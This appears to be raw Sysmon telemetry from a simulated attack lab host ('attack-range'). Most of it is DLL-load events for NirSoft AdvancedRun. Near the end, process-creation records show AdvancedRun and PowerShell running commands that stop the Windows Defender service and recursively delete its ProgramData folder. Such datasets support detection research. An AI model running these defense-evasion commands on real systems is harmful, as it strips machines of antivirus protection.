2\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.679{834264DD-0AAD-61E7-0B00-000000002402}6285236C:\Windows\system32\lsass.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000002968189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.359{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.358{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.357{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.352{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.346{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.344{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.342{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.340{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.333{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating 
SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.333{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.331{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.330{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000002967883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.328{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967868Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.328{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.321{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.321{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.313{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.309{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967733Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.307{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.298{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.283{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.282{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000002967666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.284{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.276{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.283{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.282{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.265{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967594Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.277{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.260{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967547Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.240{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000002967542Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.240{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000002967540Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.199{834264DD-0DBC-61E7-DC00-000000002402}20924344C:\Windows\system32\csrss.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002967539Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.189{834264DD-0DCB-61E7-F800-000000002402}52965668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.n
i.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000002967538Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.167{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 
/RunC:\Users\Administrator\AppData\Local\Temp\advancedrun\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002964186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:17:37.761{834264DD-DF81-61E9-DE61-000000002402}8072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\AdvancedRun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\advancedrun\AdvancedRun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002963805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:17:32.885{834264DD-DF7C-61E9-DB61-000000002402}8040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating 
SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\AdvancedRun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002962544Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 